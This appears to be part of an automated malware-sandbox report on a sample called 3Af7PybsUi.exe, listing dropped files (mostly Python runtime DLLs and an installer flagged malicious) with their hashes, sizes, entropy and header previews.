                                                                                                                                Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.42.0).Root-Is-Purelib: false.Tag: cp39-abi3-win_amd64..
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):13
                                                                                                                                Entropy (8bit):3.2389012566026314
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:cOv:Nv
                                                                                                                                MD5:E7274BD06FF93210298E7117D11EA631
                                                                                                                                SHA1:7132C9EC1FD99924D658CC672F3AFE98AFEFAB8A
                                                                                                                                SHA-256:28D693F929F62B8BB135A11B7BA9987439F7A960CC969E32F8CB567C1EF79C97
                                                                                                                                SHA-512:AA6021C4E60A6382630BEBC1E16944F9B312359D645FC61219E9A3F19D876FD600E07DCA6932DCD7A1E15BFDEAC7DBDCEB9FFFCD5CA0E5377B82268ED19DE225
                                                                                                                                Malicious:false
                                                                                                                                Preview:cryptography.
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):7227392
                                                                                                                                Entropy (8bit):6.563567185000009
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:L7vWIDI8B92Fbq5Vv1Q3rBIU6ikGtlqQVwASOGRw8beAOmnDvghmCoADPDMBMXLq:pi2++POmnDIrPDMyGnTLQmD/
                                                                                                                                MD5:F918173FBDC6E75C93F64784F2C17050
                                                                                                                                SHA1:163EF51D4338B01C3BC03D6729F8E90AE39D8F04
                                                                                                                                SHA-256:2C7A31DEC06DF4EEC6B068A0B4B009C8F52EF34ACE785C8B584408CB29CE28FD
                                                                                                                                SHA-512:5405D5995E97805E68E91E1F191DC5E7910A7F2BA31619EB64AFF54877CBD1B3FA08B7A24B411D095EDB21877956976777409D3DB58D29DA32219BF578CE4EF2
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)..m...m...m...d.@.....2..o...2..|...2..e...2..i....2..o...m...L......|...1......m.......1..l...1..l...Richm...........................PE..d....o_f.........." ...'..S.........D+R.......................................n...........`...........................................i.p.....i.|............`j.DO............m......Lc.T....................Lc.(....Jc.@.............S..............................text.....S.......S................. ..`.rdata.......S.......S.............@..@.data....!...0i......"i.............@....pdata..DO...`j..P....j.............@..@.reloc........m......hm.............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5191960
                                                                                                                                Entropy (8bit):5.962142634441191
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:98304:n3+pefu6fSar+SJ8aqfPomg1CPwDvt3uFlDCE:3G+u6fb+SJ8aqfwmg1CPwDvt3uFlDCE
                                                                                                                                MD5:E547CF6D296A88F5B1C352C116DF7C0C
                                                                                                                                SHA1:CAFA14E0367F7C13AD140FD556F10F320A039783
                                                                                                                                SHA-256:05FE080EAB7FC535C51E10C1BD76A2F3E6217F9C91A25034774588881C3F99DE
                                                                                                                                SHA-512:9F42EDF04C7AF350A00FA4FDF92B8E2E6F47AB9D2D41491985B20CD0ADDE4F694253399F6A88F4BDD765C4F49792F25FB01E84EC03FD5D0BE8BB61773D77D74D
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...m..l...i..l...h..l...o..l..m.y.l...m...l...o..l...h.l...l..l......l...n..l.Rich.l.........PE..d......e.........." ...%..7..4......v.........................................O.......P...`.........................................P.H.0....kN.@.....N.|.....K.d.....O../....N....P.C.8.............................C.@............`N..............................text.....7.......7................. ..`.rdata....... 7.......7.............@..@.data....n....K..<....J.............@....pdata..0.....K......4K.............@..@.idata...%...`N..&....N.............@..@.00cfg..u.....N.......N.............@..@.rsrc...|.....N......0N.............@..@.reloc........N......8N.............@..B................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):39696
                                                                                                                                Entropy (8bit):6.641880464695502
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):787224
                                                                                                                                Entropy (8bit):5.609561366841894
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:ytPc2nnGoNg4kSHoxX09yO5EavUFe9Xb12:y9jnnpTHoxXUsFe9XbM
                                                                                                                                MD5:19A2ABA25456181D5FB572D88AC0E73E
                                                                                                                                SHA1:656CA8CDFC9C3A6379536E2027E93408851483DB
                                                                                                                                SHA-256:2E9FBCD8F7FDC13A5179533239811456554F2B3AA2FB10E1B17BE0DF81C79006
                                                                                                                                SHA-512:DF17DC8A882363A6C5A1B78BA3CF448437D1118CCC4A6275CC7681551B13C1A4E0F94E30FFB94C3530B688B62BFF1C03E57C2C185A7DF2BF3E5737A06E114337
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>:V.PiV.PiV.Pi_..iX.PiC.QhT.Pi..QhT.PiC.UhZ.PiC.Th^.PiC.ShR.PillQhU.PiV.QiH.PillThf.PillPhW.Pill.iW.PillRhW.PiRichV.Pi................PE..d......e.........." ...%.*..........K........................................ ............`..........................................g...Q..............s.......@M......./......`.......8...........................`...@............p...............................text...D).......*.................. ..`.rdata..Hy...@...z..................@..@.data....N.......H..................@....pdata...V.......X..................@..@.idata...c...p...d...H..............@..@.00cfg..u...........................@..@.rsrc...s...........................@..@.reloc..4...........................@..B........................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):202008
                                                                                                                                Entropy (8bit):6.368795678805223
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:Znguk4rd6FjFMww6c+K+7X5icE878J0JhivihkzOv/:PrrYivi9v/
                                                                                                                                MD5:958231414CC697B3C59A491CC79404A7
                                                                                                                                SHA1:3DEC86B90543EA439E145D7426A91A7ACA1EAAB6
                                                                                                                                SHA-256:EFD6099B1A6EFDADD988D08DCE0D8A34BD838106238250BCCD201DC7DCD9387F
                                                                                                                                SHA-512:FD29D0AAB59485340B68DC4552B9E059FFB705D4A64FF9963E1EE8A69D9D96593848D07BE70528D1BEB02BBBBD69793EE3EA764E43B33879F5C304D8A912C3BE
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!...@..@..@..8N..@.....@.....@.....@.....@.....@..8..@..@..@.....@.....@..."..@.....@.Rich.@.........................PE..d.....bf.........." ...(..................................................... ............`............................................P...@............................/..........`4..T........................... 3..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...p ..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):68376
                                                                                                                                Entropy (8bit):6.150066249409429
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:GV1EbYGVXq6KC/prVHBN0cW18itCQDFPnOMFn+gikF/nFX14uewjBcCCC0yamM/L:GDmF61JFn+/OxpISL0v7Syqx0
                                                                                                                                MD5:A07661C5FAD97379CF6D00332999D22C
                                                                                                                                SHA1:DCA65816A049B3CCE5C4354C3819FEF54C6299B0
                                                                                                                                SHA-256:5146005C36455E7EDE4B8ECC0DC6F6FA8EA6B4A99FEDBABC1994AE27DFAB9D1B
                                                                                                                                SHA-512:6DDEB9D89CCB4D2EC5D994D85A55E5E2CC7AF745056DAE030AB8D72EE7830F672003F4675B6040F123FC64C19E9B48CABD0DA78101774DAFACF74A88FBD74B4D
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5..Te..Te..Te...m..Te...e..Te.....Te...g..Te.Rich.Te.........PE..d.....bf.........." ...(............................................................OX....`.........................................`...H................................/..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6926616
                                                                                                                                Entropy (8bit):5.7675148099570395
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:PPknDqOJlpxSupRo2vXDZ2lgghXQIX2CG4Ts99kdwQAvyodh1GCOepxk1NHh8yfE:kdlpx9p5Loehv6JfDvXHDMiETH+0Tn
                                                                                                                                MD5:D521654D889666A0BC753320F071EF60
                                                                                                                                SHA1:5FD9B90C5D0527E53C199F94BAD540C1E0985DB6
                                                                                                                                SHA-256:21700F0BAD5769A1B61EA408DC0A140FFD0A356A774C6EB0CC70E574B929D2E2
                                                                                                                                SHA-512:7A726835423A36DE80FB29EF65DFE7150BD1567CAC6F3569E24D9FE091496C807556D0150456429A3D1A6FD2ED0B8AE3128EA3B8674C97F42CE7C897719D2CD3
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D..N%..N%..N%......L%....m.@%......J%......F%......C%..G]..T%...]..E%..N%..>$..]....%..]...O%..].o.O%..]...O%..RichN%..........................PE..d.....bf.........." ...(..(..<B......w.......................................pj.....[.j...`..........................................VN.d...D$O.......i......._..J....i../....i..[....2.T.....................H.(.....2.@.............(..............................text.....'.......(................. ..`.rdata...9'...(..:'...(.............@..@.data....L...PO......>O.............@....pdata...J...._..L....^.............@..@PyRuntim0.....a.......a.............@....rsrc.........i.......h.............@..@.reloc...[....i..\...&h.............@..B........................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):670720
                                                                                                                                Entropy (8bit):6.031732543230407
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:NQB2xCzIWn6O6X0f3O+0kMFN8v4+arfopdLvt:NQQxHWn66f++0k2FWt
                                                                                                                                MD5:A2CC25338A9BB825237EF1653511A36A
                                                                                                                                SHA1:433DED40BAB01DED8758141045E3E6658D435685
                                                                                                                                SHA-256:698B9B005243163C245BFA22357B383E107A1D21A8C420D2EF458662E410422F
                                                                                                                                SHA-512:8D55D3F908E2407662E101238DACDBD84AE197E6E951618171DEEAC9CFB3F4CB12425212DBFD691A0B930DA43E1A344C5004DE7E89D3AEC47E9063A5312FA74B
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`...3...3...3..\3...3...2...3...2...3...2...3...2...3...2...3U..2...3...2...3...3..3U..2..3U..2...3U..2...3Rich...3................PE..d...|..d.........." ......................................................................`..........................................U...c..............l....@...z............... ......T...........................@...8............................................text............................... ..`.rdata...$.......&..................@..@.data....L..........................@....pdata...z...@...|..................@..@.rsrc...l...........................@..@.reloc... ......."..................@..B........................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):134656
                                                                                                                                Entropy (8bit):5.9953900911096785
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:Yuh2G0a2fYrFceQaVK756Y/r06trvoEKQAe7KL8KJKVKGajt4:Yuh2faiYrFceQaVfY/rxTBAe7KwKwVrE
                                                                                                                                MD5:26D752C8896B324FFD12827A5E4B2808
                                                                                                                                SHA1:447979FA03F78CB7210A4E4BA365085AB2F42C22
                                                                                                                                SHA-256:BD33548DBDBB178873BE92901B282BAD9C6817E3EAC154CA50A666D5753FD7EC
                                                                                                                                SHA-512:99C87AB9920E79A03169B29A2F838D568CA4D4056B54A67BC51CAF5C0FF5A4897ED02533BA504F884C6F983EBC400743E6AD52AC451821385B1E25C3B1EBCEE0
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.$g..wg..wg..wn.[wk..w5..vc..w..5wf..w5..vs..w5..vo..w5..vd..ws..vf..w...ve..ws..vl..wg..w...w...vj..w...vf..w...vf..wRichg..w........PE..d......d.........." ................L........................................P............`......................................... u..`B......,....0..l.......L............@..0...`Q..T............................Q..8............................................text............................... ..`.rdata..R...........................@..@.data....-.......(..................@....pdata..L...........................@..@.rsrc...l....0......................@..@.reloc..0....@......................@..B........................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:modified
                                                                                                                                Size (bytes):31000
                                                                                                                                Entropy (8bit):6.554631307714331
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:2RVBC9t6Lhz64wHqFslDT90YpISQGrHQIYiSy1pCQ+42AM+o/8E9VF0Nyes:YGyIHqG1HpISQG75YiSyvB2AMxkEp
                                                                                                                                MD5:D0CC9FC9A0650BA00BD206720223493B
                                                                                                                                SHA1:295BC204E489572B74CC11801ED8590F808E1618
                                                                                                                                SHA-256:411D6F538BDBAF60F1A1798FA8AA7ED3A4E8FCC99C9F9F10D21270D2F3742019
                                                                                                                                SHA-512:D3EBCB91D1B8AA247D50C2C4B2BA1BF3102317C593CBF6C63883E8BF9D6E50C0A40F149654797ABC5B4F17AEE282DDD972A8CD9189BFCD5B9CEC5AB9C341E20B
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........t..'..'..'..g'..'...&..'...&..'...&..'...&..'...&..'..'...'...&..'...&..'...&..'...'..'...&..'Rich..'........PE..d.....bf.........." ...(.....2............................................................`..........................................@..L...<A..x....p.......`.......J.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...`....P.......8..............@....pdata.......`.......:..............@..@.rsrc........p.......>..............@..@.reloc..L............H..............@..B................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1138456
                                                                                                                                Entropy (8bit):5.461934346955969
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:LrEHdcM6hbqCjJ43w9hIpCQvb0QN8MdIEQ+U2BNNmD+99FfcAjL:LrEXPCjfk7bPNfv42BN6yzUAjL
                                                                                                                                MD5:CC8142BEDAFDFAA50B26C6D07755C7A6
                                                                                                                                SHA1:0FCAB5816EAF7B138F22C29C6D5B5F59551B39FE
                                                                                                                                SHA-256:BC2CF23B7B7491EDCF03103B78DBAF42AFD84A60EA71E764AF9A1DDD0FE84268
                                                                                                                                SHA-512:C3B0C1DBE5BF159AB7706F314A75A856A08EBB889F53FE22AB3EC92B35B5E211EDAB3934DF3DA64EBEA76F38EB9BFC9504DB8D7546A36BC3CABE40C5599A9CBD
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.....}...}...}......}..*|...}..*~...}..*y...}..*x...}..-|...}.H.|...}...|.S.}..-p...}..-}...}..-....}..-....}.Rich..}.........................PE..d.....bf.........." ...(.@..........0*.......................................p............`.........................................p...X............P.......@.......0.../...`......P^..T............................]..@............P..p............................text...!>.......@.................. ..`.rdata..\....P.......D..............@..@.data........ ......................@....pdata.......@......................@..@.rsrc........P.......$..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):14848
                                                                                                                                Entropy (8bit):5.116470324236407
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:yxCm72PEO1jIUs0YqEcPbF55UgCWV4rofnbPietE4kqDLWn7ycLmr0/:gardA0Bzx14r6nbKJ0Wr/
                                                                                                                                MD5:7CFF63D632A7024E62DB2A2BCE9A1B24
                                                                                                                                SHA1:6A0BC8ADD112CC66EE4FD1C907F2F7E49B6BD1CF
                                                                                                                                SHA-256:DF8BA0C5B50CA3B5C0B3857F926118EFBEB9744B8F382809858BA426BF4A2268
                                                                                                                                SHA-512:3FC02CB3BBD71B75BDC492DC2C89C9D59839AA484CFAFF3FD6537AE8BB3427969CD9EF90978F5CB25A87AF8D2CAE96E2184FDC59115E947A05AA9E0378807227
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d.f. ... ... ...).."...r..."...4..."...r...+...r...(...r...#.......#... ...........!.......!.......!...Rich ...........PE..d......d.........." ......................................................................`..........................................;..`...`;..d....p..t....`..................@...|2..T............................2..8............0..p............................text............................... ..`.rdata..$....0......................@..@.data........P......................@....pdata.......`.......0..............@..@.rsrc...t....p.......4..............@..@.reloc..@............8..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):133632
                                                                                                                                Entropy (8bit):5.851293297484796
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:bPwB2zC1vwC3XetCf5RlRVFhLaNKPRyymoh5Lm9b0e:bIB2zkvwGXetCfDlRVlPRy85Lm9
                                                                                                                                MD5:3A80FEA23A007B42CEF8E375FC73AD40
                                                                                                                                SHA1:04319F7552EA968E2421C3936C3A9EE6F9CF30B2
                                                                                                                                SHA-256:B70D69D25204381F19378E1BB35CC2B8C8430AA80A983F8D0E8E837050BB06EF
                                                                                                                                SHA-512:A63BED03F05396B967858902E922B2FBFB4CF517712F91CFAA096FF0539CF300D6B9C659FFEE6BF11C28E79E23115FD6B9C0B1AA95DB1CBD4843487F060CCF40
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I^.f'..f'..f'......f'...&..f'...#..f'...$..f'.o.&..f'..."..f'...&..f'..f&..g'.o....f'.o.'..f'.o.%..f'.Rich.f'.................PE..d......d.........." .........................................................P............`..........................................................0..\....................@..$....v..T............................<..8............0..........@....................text...$........................... ..`.rdata......0......................@..@.data...x(......."..................@....pdata..............................@..@.rsrc...\....0......................@..@.reloc..$....@......................@..B................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):123904
                                                                                                                                Entropy (8bit):5.966619585818369
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:07jbPA0SD9S3vrCqf93qMHxCjdLZn1Ya:07jtS9SfuCRCjFV
                                                                                                                                MD5:47C91C74BB2C5CF696626AF04F3705AB
                                                                                                                                SHA1:C086BC2825969756169FAB7DD2E560D360E1E09C
                                                                                                                                SHA-256:F6EAD250FC2DE4330BD26079A44DED7F55172E05A70E28AD85D09E7881725155
                                                                                                                                SHA-512:E6B6A4425B3E30CEA7BF8B09971FA0C84D6317B1A37BC1518266DC8D72C166099A8FC40A9B985300901BD921E444FF438FD30B814C1F1C6A051DF3471615C2BD
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........U...U...U...\.v.S.......Q.......E.......].......V.....Q...A...R...U........\.....T.....T...RichU...........PE..d......d.........." ................(........................................ ............`..........................................o..................d.......................H....G..T............................H..8............................................text...~........................... ..`.rdata..............................@..@.data....-.......(..................@....pdata..............................@..@.rsrc...d...........................@..@.reloc..H...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23040
                                                                                                                                Entropy (8bit):5.356227710749481
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:JbuxajLxmByUDH2So0JVPYesgA0T8Dm7R8WnjVDtErNnpC9a1BC:JS4UDWC0e8WjVZc68B
                                                                                                                                MD5:0F65C9D8A87799FFB6D932FC0D323E24
                                                                                                                                SHA1:11E25879E1BF09A3589404C2AD8D0720FE82D877
                                                                                                                                SHA-256:764915DAD87ABC6252251699A2A98EFB0C23C296239E96F567CD76E242C897E1
                                                                                                                                SHA-512:5B6B6B3E38F390BEEA18A66627E5B82B5E0B0294E1941968E755D5F9AFE00436778ADC153D8D8E3110CC03D30276FF18920150C5BD4D672821CB285F5E1EF121
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>].OP..OP..OP..7...OP..:Q..OP..:U..OP..:T..OP..:S..OP..:Q..OP..$Q..OP..OQ..OP..:Y..OP..:P..OP..:R..OP.Rich.OP.................PE..d......d.........." .....*...,.......'....................................................`..........................................Q..T...dQ..........d....p.......................G..T...........................0H..8............@...............................text....).......*.................. ..`.rdata.......@......................@..@.data...(....`.......J..............@....pdata.......p.......P..............@..@.rsrc...d............T..............@..@.reloc...............X..............@..B................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):25157416
                                                                                                                                Entropy (8bit):7.997552151228202
                                                                                                                                Encrypted:true
                                                                                                                                SSDEEP:393216:eDU6aubdmT1K7iJC6b+dm9kgTWrB3ldBVO9dJiNQbaWd6LwnCtYr6ICEy6uafw:eDUCY1I6KI9kgTiPdjWaypdwxc9Nyyfw
                                                                                                                                MD5:4FE11B2B0BB0C744CF74AFF537F7CD7F
                                                                                                                                SHA1:B4F5627009F897D3CE9664242E7F7968B55759F1
                                                                                                                                SHA-256:B5884FA3F05F88BBB617D08584930770C00BBCF675F2865A9161C2358829B605
                                                                                                                                SHA-512:80F535F7BC5A3D0A7D645C432EC8FDC86474E129D318C474BEC043B568D969E989F2D1D3CDE955D4316405E2DCCE74AA07ADC4734756CB833495910F443C3A13
                                                                                                                                Malicious:true
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........[.s...s...s.......s......$s.......s.......s.......s.......s.......s.......s...s...r.......s....Q..s...s9..s.......s..Rich.s..........................PE..L....RKa..........................................@.................................4.....@.................................<............e.............P)...P...=...{..T....................{.......z..@............................................text.............................. ..`.rdata..t...........................@..@.data...............................@....wixburn8...........................@..@.rsrc....e.......f..................@..@.reloc...=...P...>..................@..B........................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4
                                                                                                                                Entropy (8bit):2.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qn:qn
                                                                                                                                MD5:3F1D1D8D87177D3D8D897D7E421F84D6
                                                                                                                                SHA1:DD082D742A5CB751290F1DB2BD519C286AA86D95
                                                                                                                                SHA-256:F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
                                                                                                                                SHA-512:2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
                                                                                                                                Malicious:false
                                                                                                                                Preview:blat
                                                                                                                                Process:C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe
                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (675), with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):101308
                                                                                                                                Entropy (8bit):3.7248729769473004
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:XzPIgTPT/s2iA9JI4kzlgfTlQCQZ01s56H7OCGVfXzRz2mUF7J7PG2km/MqIAcdF:XzPIrlklBY5
                                                                                                                                MD5:37D5E3E690BF0E58DB9873516812599D
                                                                                                                                SHA1:9E6D1E4CD46EEFCD2B585EB1A450231817D251F9
                                                                                                                                SHA-256:4C694653B483F1024371A058EFF0022F9E850ABCB3771F9083BF002C48A7506D
                                                                                                                                SHA-512:3418D3A63874169527453D405CF5559382036FCB5C67A67D2473F20BD99CD706537F00AD7932E026CA8D21999AB6A7153D2C6567BDB4653A35682D93F3070949
                                                                                                                                Malicious:false
